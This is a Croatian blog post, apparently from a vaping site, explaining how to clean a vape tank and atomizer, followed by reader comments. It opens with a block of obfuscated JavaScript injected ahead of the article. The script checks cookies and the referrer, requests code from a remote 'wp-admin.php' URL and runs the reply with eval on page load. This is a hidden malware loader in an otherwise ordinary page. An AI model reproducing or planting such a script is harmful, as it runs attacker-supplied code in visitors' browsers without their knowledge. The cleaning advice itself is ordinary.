;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kako ispravno očistiti atomizer

Vaping je popularan način za prestanak pušenja tradicionalnih cigareta, a u ovom postu raspravljat ćemo o tome kako očistiti spremnik za vape i isparivač kako bi održali njegovu najbolju učinkovitost. 

E-cigarete koriste sustav spremnika koji drži e-tekućinu u komori u kojoj je izložena grijaćem elementu. Ako se spremnik za vape ne čisti redovito, to ga može oštetiti i utjecati na performanse. Također može utjecati na okus – zamislite da parite tekućinu s okusom kave, a zatim prelazite na bobičasto voće. Kada se zavojnica napuni prljavštinom, to će uzrokovati smanjenje okusa i proizvodnje pare vašeg vapea, pa čak i okus zagorenoga. 

Zašto je važno čistiti isparivač?

Svrha čišćenja isparivača je izbjegavanje nakupljanja ostataka koji se gomilaju u spremniku, a koji mogu promijeniti okus. Nakupljanje također utječe na performanse – vaš će vape imati smanjen okus i previše topline, što ga može uništiti. 

Čisti isparivač će trajati dulje, imati bolji učinak i bolji okus. Kada parite s prljavim ili začepljenim spremnikom, događaju se sljedeće stvari: 

 • Prljavi spremnik za vape može sadržavati bakterije i druge mikroorganizme, što može dovesti do želučanih tegoba ili goreg. 
 • Smanjena proizvodnja okusa i para 
 • Vape sa zagorenim okusom 
 • Curenje iz atomizera jer tekućina ulazi u komoru grijaćeg elementa. To može dovesti do opasnih situacija jer elektronika dođe u dodir s tekućinama ili ako tekućina dospije u električne dijelove. 
 • Smanjen životni vijek baterije i moda kao rezultat izgaranja soka brže od očekivanog. 
 • To može uzrokovati brzo izgaranje zavojnica i trebat će ih češće mijenjati 
 • Tekućina bi mogla dospjeti u usnik, što znači da se vi ili netko drugi tko dodirne vaš vape vrlo lako razbolite – to uključuje kućne ljubimce i djecu. 

Stoga je redovito čišćenje spremnika za vape i cijelog uređaja važno za zdravlje vašeg isparivača i najbolje iskustvo s vapeom. A ako imate astmu ili respiratorno stanje, redovito čišćenje spremnika za vape pomoći će spriječiti da se pogorša! 

Čime očistiti atomizer?

Koristite ili sredstvo za čišćenje na bazi alkohola kao što je medicinski alkohol razrijeđen u toploj vodi za čišćenje tvrdokornih mrlja iznutra i izvana, otopinu izbjeljivača (razrijeđen izbjeljivač je siguran za sve gumene dijelove) ako ima hrđe/kalcija ili sapun (po mogućnosti onaj bez kemikalija), čisti 91% alkohol ili drugi alkohol visoke otpornosti ili napravite otopinu za čišćenje napravljenu miješanjem 30 ml destiliranog bijelog octa sa 120 ml kipuće vode. Uspijet će i stari kućanski trik – soda bikarbona! 

Čišćenje atomizera korak po korak

 1. Izvadite spremnik (tank) za vape iz svog isparivača i ispraznite ga od bilo kakve tekućine. Isperite čistom vodom ako u spremniku još uvijek ima tekućine. 
 1. Da biste uklonili ostatke s unutarnjih rubova do kojih ne možete doći krpom za suđe ili papirnatim ručnikom, koristite štapiće za uši. Za dubinsko čišćenje napunite spremnik sredstvom za čišćenje po vašem izboru i pustite ga da se namače nekoliko minuta, a zatim ga očistite i isperite. 
 1. Izvadite sve zamjenjive dijelove iz unutrašnjosti vašeg isparivača (zavojnice) i temeljito ih isperite čistom vodom. Imajte na umu kamo sve ide i pokušajte ne izgubiti male dijelove. (Savjet: svaki komad stavite u zdjelu) 
 1. Ako je spremnik za vape napravljen od plastike, onda natapanje na dulje vrijeme može uzrokovati da plastika postane lomljiva ili oslabi. Napunite spremnik i ostavite da se namače oko 15 minuta. Zatim upotrijebite krpu za suđe umočenu u vodu na niskoj temperaturi kako biste isprali ostatke s unutarnjih rubova gdje alkohol nije dospio, nemojte ništa sušiti odmah! 
 1. Osušite sve papirnatim ručnikom što bolje možete i pustite da se potpuno osuši na zraku prije nego što sve dijelove stavite u isparivač i ponovno sastavite cijeli uređaj. 
 1. Ne zaboravite očistiti usnik prije nego ga vratite na atomizer.  

Što sve bude čistije, to će vaš vape biti bolji! 

Choose your Reaction!
 • ne treba zaboravit podmazat sve gumice (ne sa WD-40) sa glicerinom ili e-tekućinom prilikom sastavljanja atomizera, da ne bi zapeklo slučajno i da brtve duže traju…

 • Ja sve svoje atomizere detaljno rastavljam i ostavljam da odmoče u toploj (ne vreloj) vodi. U koju stavim malo deterdženta za pranje posuđa.
  I lagano izribam sve dijelove četkicom za zube, da se skinu moguće naslage sa dijelova atomizera.
  Nakon toga ide kompletno ispiranje pod mlazom tople vode.
  Onda stavim na papirnati ubrus i tako ostavim neko vrijeme, i po par sati da se dobro posuši.
  Većinom nakon toga nemam potrebu bilo što brisati papirnatim ubrusom, mada katkad i ostane malo mokro pa obrišem, ali većinom se sve posuši kako treba.
  Uvijek mijenjam i pamuk i grijač, ne da mi se stavljati novi pamuk na već korišteni grijač. No, to je moj izbor, ne velim da svi tako trebaju.
  Ovaj moj sistem sa čekanjem da se posuši par sati meni ne smeta jer radim većinom planski rebuild atomizera
  i dok se recimo 2 suše, ja za to vrijeme parim na druga dva.
  Dakako da nije bilo tako na samom početku kad sam imao samo jedan mod i jedan atomizer,
  no eto…sad imam malo više opreme pa si mogu priuštiti taj luxuz sa čekanjem da se sve dobro posuši.

  Na kraju, pohvala za članak Simona.
  Kratko i informativno, vjerujem da će pomoći kojem totalnom početniku koji”zaluta” ovamo i pročita isti.

  Lijep pozdrav:)

 • Dok sam koristila Atomizere sa fabričkim glavama manje sam vodila računa.. grejač sam koristila dok se ukus ne promeni, zatim sam ga bacala a novi stavljala..
  Od kada sama pravim grejače, sve se promenilo, češće menajm tečnosti jer je potrebno samo vatu zameniti.. od prilike na svaku treću zamenu vate, pravim i novi grejač i tad detaljno perem i tank…

Leave a Comment